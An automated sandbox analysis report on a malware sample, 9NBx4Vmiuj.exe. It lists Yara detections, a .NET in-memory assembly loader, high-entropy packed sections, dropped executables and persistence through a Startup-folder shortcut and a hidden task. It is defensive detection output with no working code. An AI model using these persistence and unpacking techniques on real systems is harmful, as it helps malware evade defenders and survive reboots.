Source:	Binary string: Pjraflkwkhj.pdb source: 9NBx4Vmiuj.exe, 00000000.00000002.2128727924.000002342CE13000.00000004.00000800.00020000.00000000.sdmp, 9NBx4Vmiuj.exe, 00000000.00000002.2128727924.000002342CC3B000.00000004.00000800.00020000.00000000.sdmp, 9NBx4Vmiuj.exe, 00000000.00000002.2132514547.0000023435160000.00000004.08000000.00040000.00000000.sdmp, TypeId.exe, 00000002.00000002.2158779274.000002184E741000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3409147293.000001E3C9781000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000007.00000002.2610110087.0000020937261000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

.NET source code contains potential unpacker

Source: 9NBx4Vmiuj.exe, Program.cs	.Net Code: Main System.Reflection.Assembly.Load(byte[])
Source: 0.2.9NBx4Vmiuj.exe.2342d191148.11.raw.unpack, TypeModel.cs	.Net Code: TryDeserializeList
Source: 0.2.9NBx4Vmiuj.exe.2342d191148.11.raw.unpack, ListDecorator.cs	.Net Code: Read
Source: 0.2.9NBx4Vmiuj.exe.2342d191148.11.raw.unpack, TypeSerializer.cs	.Net Code: CreateInstance
Source: 0.2.9NBx4Vmiuj.exe.2342d191148.11.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateInstance
Source: 0.2.9NBx4Vmiuj.exe.2342d191148.11.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateIfNull

Yara detected Costura Assembly Loader

Source: Yara match	File source: 2.2.TypeId.exe.2184e8f82a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.TypeId.exe.2184e7e01f8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.1e3c98201f8.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.TypeId.exe.20937378268.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.TypeId.exe.2184e858268.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.TypeId.exe.20937328230.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.1e3c98201f8.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.TypeId.exe.209374182a0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.TypeId.exe.20926dfd5f0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.9NBx4Vmiuj.exe.2342cfb01f8.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.TypeId.exe.2184e7e01f8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.TypeId.exe.2184e808230.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.1e3c9898268.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.1e3c99382a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.1e3c9848230.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.9NBx4Vmiuj.exe.2342cfd8230.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.TypeId.exe.209373001f8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.TypeId.exe.20937328230.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.TypeId.exe.2184e808230.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.1e3c9848230.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.TypeId.exe.209373001f8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.9NBx4Vmiuj.exe.2341c890000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.9NBx4Vmiuj.exe.2342cfd8230.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.9NBx4Vmiuj.exe.2342d0c82a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.9NBx4Vmiuj.exe.2342cfb01f8.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.TypeId.exe.20926dfd5f0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.9NBx4Vmiuj.exe.2342ce13500.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.2610110087.0000020937418000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2126079355.000002341C890000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2158779274.000002184E8F8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2610110087.0000020937300000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3409147293.000001E3C9938000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3376937115.000001E3B9201000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2128727924.000002342CE13000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2126196926.000002341C991000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3409147293.000001E3C9848000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2591573237.0000020926CE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2150448933.000002183E1C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3409147293.000001E3C9898000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2158779274.000002184E858000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2610110087.0000020937378000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2158779274.000002184E7E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2610110087.0000020937328000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2158779274.000002184E808000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3409147293.000001E3C9820000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2128727924.000002342D0C8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 9NBx4Vmiuj.exe PID: 7060, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TypeId.exe PID: 1248, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 348, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TypeId.exe PID: 7224, type: MEMORYSTR

Source: 9NBx4Vmiuj.exe

Static PE information: 0xE589AE2F [Sat Jan 12 19:44:47 2092 UTC]

Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Code function: 0_2_00007FF8489C197F push ecx; ret	0_2_00007FF8489C1980
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Code function: 0_2_00007FF8489C09F5 push edx; ret	0_2_00007FF8489C09F6
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Code function: 0_2_00007FF8489BE9C3 push ecx; ret	0_2_00007FF8489BE9C4
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Code function: 0_2_00007FF8489BF9C0 push ecx; ret	0_2_00007FF8489BF9C1
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Code function: 0_2_00007FF8489C1936 push eax; ret	0_2_00007FF8489C1937
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Code function: 0_2_00007FF8489BF12C push eax; ret	0_2_00007FF8489BF12D
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Code function: 0_2_00007FF8489BF974 push ecx; ret	0_2_00007FF8489BF975
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Code function: 0_2_00007FF8489C0A9A push edx; ret	0_2_00007FF8489C0A9B
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Code function: 0_2_00007FF8489B9A82 push ecx; ret	0_2_00007FF8489B9A84
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Code function: 0_2_00007FF8489BFA97 push ecx; ret	0_2_00007FF8489BFA98
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Code function: 0_2_00007FF8489BD294 push ecx; ret	0_2_00007FF8489BD295
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Code function: 0_2_00007FF8489B0848 push ds; retf 5F4Dh	0_2_00007FF8489B5B0F
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Code function: 0_2_00007FF8489BD226 push ecx; ret	0_2_00007FF8489BD227
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Code function: 0_2_00007FF8489C0230 push ecx; ret	0_2_00007FF8489C0231
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Code function: 0_2_00007FF8489C0A58 push edx; ret	0_2_00007FF8489C0A59
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Code function: 0_2_00007FF8489B4A55 push ds; retf 5F4Dh	0_2_00007FF8489B5B0F
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Code function: 0_2_00007FF8489C03B3 push ecx; ret	0_2_00007FF8489C03B4
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Code function: 0_2_00007FF8489BCB96 push ecx; ret	0_2_00007FF8489BCB97
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Code function: 0_2_00007FF8489BE3DB push edx; ret	0_2_00007FF8489BE3DC
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Code function: 0_2_00007FF8489C03F1 push ecx; ret	0_2_00007FF8489C03F2
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Code function: 0_2_00007FF8489B7BF1 push 39D0B948h; ret	0_2_00007FF8489B7BF6
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Code function: 0_2_00007FF8489BFB09 push ecx; ret	0_2_00007FF8489BFB0A
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Code function: 0_2_00007FF8489BF35C push ecx; ret	0_2_00007FF8489BF35D
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Code function: 0_2_00007FF8489B9B71 push ecx; ret	0_2_00007FF8489B9B72
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Code function: 0_2_00007FF8489BBB69 push ecx; ret	0_2_00007FF8489BBB6A
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Code function: 0_2_00007FF8489B9B3B push ecx; ret	0_2_00007FF8489B9B3C
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Code function: 0_2_00007FF8489BFCA0 push ecx; ret	0_2_00007FF8489BFCA1
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Code function: 0_2_00007FF8489BDCB5 push ecx; ret	0_2_00007FF8489BDCB6
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Code function: 0_2_00007FF8489BDC85 push ecx; ret	0_2_00007FF8489BDC86
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Code function: 0_2_00007FF8489C047A push ecx; ret	0_2_00007FF8489C047B
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Code function: 0_2_00007FF8489BF496 push ecx; ret	0_2_00007FF8489BF497

Source: 9NBx4Vmiuj.exe	Static PE information: section name: .text entropy: 7.997404824515428
Source: TypeId.exe.0.dr	Static PE information: section name: .text entropy: 7.997404824515428

Persistence and Installation Behavior

Yara detected PersistenceViaHiddenTask

Source: Yara match	File source: 00000000.00000002.2135818855.00000234355C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 9NBx4Vmiuj.exe PID: 7060, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TypeId.exe PID: 1248, type: MEMORYSTR

Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	File created: C:\ProgramData\btjxg.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	File created: C:\Users\user\AppData\Local\Temp\btjxg.exe	Jump to dropped file
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	File created: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\btjxg.exe

File created: C:\ProgramData\btjxg.exe

Jump to dropped file

Boot Survival

Yara detected PersistenceViaHiddenTask

Source: Yara match	File source: 00000000.00000002.2135818855.00000234355C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 9NBx4Vmiuj.exe PID: 7060, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TypeId.exe PID: 1248, type: MEMORYSTR

Source: C:\Users\user\AppData\Local\Temp\btjxg.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\btjxg.lnk

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\btjxg.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\btjxg.lnk

Jump to behavior

Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
